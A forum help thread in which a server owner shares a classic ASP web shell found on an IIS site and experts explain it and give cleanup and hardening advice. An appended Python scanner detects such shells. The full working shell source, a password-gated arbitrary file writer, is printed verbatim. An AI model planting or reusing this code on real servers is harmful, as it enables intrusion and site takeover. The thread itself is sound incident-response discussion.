Solved

iis hack - can someone help decipher this text file left on my server ?

Posted on 2013-01-15
445 Views
Last Modified: 2013-01-16
I recently noticed a text file on my server. I'm having trouble deciphering it, and deciding my next steps.  I see no other files changed or added at that time.  Advice appreciated.

The .txt file is attached and code is below:

<%
on error resume next
%>
<%
if request("pass")="hack" then
session("pw")="go"
end if
%>
<%if session("pw")<>"go" then %>
<%="<center><br><form action='' method='post'>"%>
<%="<input name='pass' type='password' size='10'> <input "%>
<%="type='submit' value='Go!'></center>"%>
<%else%>
<%
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
%>
<%="success"%>
<%else%>
<%="no"%>
<%
end if
err.clear
end if
da.close
%>
<%set da=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%="wenjianlujing:"&server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%="xitong:"&Request.ServerVariables("OS")%>
<%="<br>"%>
<%="WEBFWQ:"&Request.ServerVariables("SERVER_SOFTWARE")%>
<%="<br>"%>
<%="IP:"&Request.ServerVariables("LOCAL_ADDR")%>
<%="<br>"%>
<%=""%>
<%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<%end if%>
test.txt
Question by:drelinger
7 Comments
 
LVL 50

Expert Comment

by:Steve Bink
ID: 38781228
The file looks for a form submission with a field named "pass".  If the "pass" field equals the string "hack", a session variable is set to "go".

Then it looks at the session variable.  If it is not "go", the script renders an HTML form to the user, including the "pass" field.

If the session variable is go, the script displays a different form.  The form includes some server-side information (script name, OS, etc.), a textbox named "path", and a textarea field named "da".  If this form is submitted (assuming the password check passed earlier), the contents of the field "da" from this form submission are written to the file specified in the field "path".  If the file specified in "path" already exists, it is overwritten.

This script is used to place arbitrary files on your server.  Theoretically, it could even be used to write executable files.  The script's ability to access protected areas will be determined by the security token of the user running IIS (generally, an IUSR_* account).  If you found this file on your server, it is very possible that you have other vulnerabilities or exploits installed, and that your server is currently being used to target your site's visitors for unpleasantness.
 
LVL 22

Expert Comment

by:Rick Hobbs
ID: 38781246
Where was this file located?
 
LVL 83

Expert Comment

by:Dave Baldwin
ID: 38781402
I agree with @routinet, it is a classic ASP file/program to write files on your server.

Author Comment

by:drelinger
ID: 38782803
File was located in website root directory. There are no other file changes at that specific time.
Can anyone suggest further steps I should take having found this file?
 
LVL 50

Accepted Solution

by:Steve Bink (earned 500 total points)
ID: 38782922
That really depends on how paranoid you want to be.

In my world, the server would be wiped ASAP, with all services moved to a replacement until such time as it was ready to resume service.  It wouldn't be long, since the server would be restored in full from the latest backup...you do have backups, right?

At the very least, you should begin by doing a code audit for any sites on the server.  The fact that they have access to write arbitrary files means they could theoretically write files and manipulate the meta data.  In other words, just because a file looks like it hasn't been modified, does not mean it is not modified.  One popular target is to inject obfuscated javascript just after the open body tag in HTML files.

And, of course, you need to audit the server itself.  Find out what services/DLLs/extensions are running on boot, and if they're supposed to be there.  It could have a back-door installed, or some other less-visible application designed to tamper with the network communications.

If you do nothing else, you'll need to find how that file got on the server, and close that door.  IME, most of these hacks are the result of brute-forced/dictionary'd FTP or publishing services.  Disable FrontPage/WebDAV extensions.  Force all FTP users to change their passwords, and enforce a level of password complexity.  Above all, audit the security of all user accounts associated with your web service in any way, including the system accounts.  Make sure they have the permissions they need, and nothing more.

The good news is that most incidents like this (again, IME) are drive-by attacks...fire and forget.  They find a vulnerable site (as opposed to targeting the server itself), drop some stealthy javascript redirects, and move on.  If you're on shared hosting, that is probably all it is.  If you host your own server, it is more likely to have been targeted instead of the site, but that pattern still fits.
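As an added example (not code from the thread or any poster), a Python scanner for the two indicators discussed above: the request-driven FileSystemObject write pattern of the dropped file, and a script tag placed directly after the opening body tag, which the accepted answer names as a popular injection target. The sample files it scans are constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Writer-shell indicators from the dropped file: a FileSystemObject, a text file
# created, request-supplied data written to it. All four must be present.
ASP_WRITER_INDICATORS = (r"scripting\.filesystemobject", r"\.createtextfile\s*\(",
                         r"\brequest\s*\(", r"\.write\b")
# A <script> block sitting directly after the opening <body> tag.
BODY_SCRIPT_RE = re.compile(r"<body\b[^>]*>\s*<script\b", re.IGNORECASE)
HTML_SUFFIXES = {".htm", ".html", ".asp", ".aspx"}

def is_asp_writer_shell(source):
    """True when every indicator appears (case-insensitive), as in the dropped file."""
    return all(re.search(p, source, re.IGNORECASE) for p in ASP_WRITER_INDICATORS)

def has_injected_body_script(html):
    """True when a script tag immediately follows <body ...>."""
    return BODY_SCRIPT_RE.search(html) is not None

def scan_tree(root):
    """Return (relative path, reason) for every flagged file; the shell check runs on every file (the dropped one was a .txt)."""
    root, findings = Path(root), []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        text = path.read_text(errors="replace")
        rel = path.relative_to(root).as_posix()
        if is_asp_writer_shell(text):
            findings.append((rel, "asp-writer-shell"))
        if path.suffix.lower() in HTML_SUFFIXES and has_injected_body_script(text):
            findings.append((rel, "script-after-body"))
    return findings

# Constructed samples (not real site content) so the scanner runs stand-alone.
SAMPLE_SHELL = ('<%set fso=server.createobject("scripting.filesystemobject")\n'
                'set da=fso.createtextfile(request("path"),true)\nda.write request("da")%>')
SAMPLE_CLEAN_ASP = ('<%set fso=server.createobject("scripting.filesystemobject")\n'
                    'response.write fso.opentextfile(server.mappath("n.txt")).readall%>')
SAMPLE_INJECTED = '<html><body>\n<script>eval(unescape("%41"))</script><p>Hi</p>'
SAMPLE_HTML_OK = '<html><body><p>Hi</p><script src="app.js"></script></body></html>'

def scan_samples():
    """Write the samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "test.txt").write_text(SAMPLE_SHELL)
        (root / "news.asp").write_text(SAMPLE_CLEAN_ASP)
        (root / "index.html").write_text(SAMPLE_INJECTED)
        (root / "about.html").write_text(SAMPLE_HTML_OK)
        return scan_tree(root)
```

Real shells vary in wording, so treat a hit as a lead for the code audit the accepted answer recommends, not as a verdict, and a clean run as no proof of absence.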
 
LVL 22

Expert Comment

by:Rick Hobbs
ID: 38784322
Just to be sure, I would also run a reliable anti-spyware product like Malware Antibytes.
 

Author Closing Comment

by:drelinger
ID: 38784446
Great advice. Thank you very much.
